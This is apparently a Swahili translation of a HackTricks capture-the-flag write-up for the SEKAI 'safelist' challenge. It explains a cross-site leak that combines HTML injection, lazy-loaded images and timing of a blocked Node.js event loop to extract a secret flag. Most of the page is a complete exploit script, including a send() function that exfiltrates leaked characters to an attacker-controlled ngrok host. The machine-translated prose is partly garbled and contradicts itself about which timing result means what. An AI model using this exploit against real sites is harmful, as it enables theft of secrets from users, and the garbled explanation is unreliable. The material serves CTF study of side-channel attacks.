Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia MPANGO WA KUJIUNGA!
Katika udukuzi huu, @aszx87410 anachanganya njia ya upande wa picha za uzembe kupitia kuingiza HTML na aina fulani ya njia ya kuzuia mzunguko wa tukio ili kuvuja herufi.
Hii ni udukuzi tofauti kwa changamoto ya CTF ambayo tayari ilikuwa imezungumziwa katika ukurasa ufuatao. angalia kwa maelezo zaidi kuhusu changamoto:
Machapisho yanaingizwa kwa herufi kwa utaratibu wa alfabeti
Mshambuliaji anaweza kuingiza chapisho kwa kuanza na "A", kisha tag ya HTML fulani (kama <canvas kubwa) itajaza sehemu kubwa ya skrini na baadhi ya <img lazy tags za kupakia vitu.
Ikiwa badala ya "A" mshambuliaji anaingiza chapisho sawa lakini kuanza na "z", chapisho lenye bendera litatokea kwanza, kisha chapisho lililoingizwa litatokea na "z" ya awali na canvas kubwa. Kwa sababu chapisho lenye bendera limeonekana kwanza, canvas ya kwanza itachukua nafasi yote ya skrini na <img lazy tags za mwisho zilizoingizwa hazitaonekana kwenye skrini, kwa hivyo hazitapakia.
Kisha, wakati boti ina fikia ukurasa, mshambuliaji atatuma ombi za kupata.
Ikiwa picha zilizoingizwa kwenye chapisho zinapakia, ombi za kupata hizi zitachukua muda mrefu, kwa hivyo mshambuliaji anajua kuwa chapisho kipo kabla ya bendera (kwa utaratibu wa alfabeti).
Ikiwa ombi za kupata zina haraka, inamaanisha kuwa chapisho kipo kabla ya bendera kwa utaratibu wa alfabeti.
Hebu angalia nambari:
<!DOCTYPEhtml><html><!--The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.We can use fetch to measure the request time.--><body><buttononclick="run()">start</button><!-- Inject post with payload --><formid=faction="http://localhost:1234/create"method="POST"target="_blank"><inputid=inpname="text"value=""></form><!-- Remove index --><formid=f2action="http://localhost:1234/remove"method="POST"target="_blank"><inputid=inp2name="index"value=""></form><script>let flag ='SEKAI{'constTARGET='https://safelist.ctf.sekai.team'f.action =TARGET+'/create'f2.action =TARGET+'/remove'constsleep= ms =>newPromise(r =>setTimeout(r, ms))// Function to leak info to attackerconstsend= data =>fetch('http://server.ngrok.io?d='+data)constcharset='abcdefghijklmnopqrstuvwxyz'.split('')// start exploitlet count =0setTimeout(async () => {letL=0letR=charset.length-1// I have omited code here as apparently it wasn't necesary// fallback to linerar since I am not familiar with binary search lolfor(let i=R; i>=L; i--) {let c = charset[i]send('try_'+ flag + c)constfound=awaittestChar(flag + c)if (found) {send('found: '+ flag+c)flag += cbreak}}},0)asyncfunctiontestChar(str) {returnnewPromise(resolve => {/*For 3350, you need to test it on your local to get this number.The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.*/// <canvas height="3350px"> is experimental and allow to show the injected// images when the post injected is the first one but to hide them when// the injected post is after the post with the flaginp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()setTimeout(() => {run(str, resolve)},500)})}asyncfunctionrun(str, resolve) {// Open posts page 5 timesfor(let i=1; i<=5;i++) {window.open(TARGET)}let t =0constround=30//Lets time 30 requestssetTimeout(async () => {// Send 30 requests and time eachfor(let i=0; i<round; i++) {let s =performance.now()awaitfetch(TARGET+'/?test', {mode:'no-cors'}).catch(err=>1)let end =performance.now()t += end - sconsole.log(end - s)}constavg= t/round// Send info about how much time it tooksend(str +","+ t +","+"avg:"+ avg)/*I get this threshold(1000ms) by trying multiple times on remote admin botfor example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold*/constisFound= (t >=1000)if (isFound) {inp2.value ="0"} else {inp2.value ="1"}// remember to delete the post to not break our leak oraclef2.submit()setTimeout(() => {resolve(isFound)},200)},200)}</script></body></html>
Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF? Angalia MPANGO WA KUJIUNGA!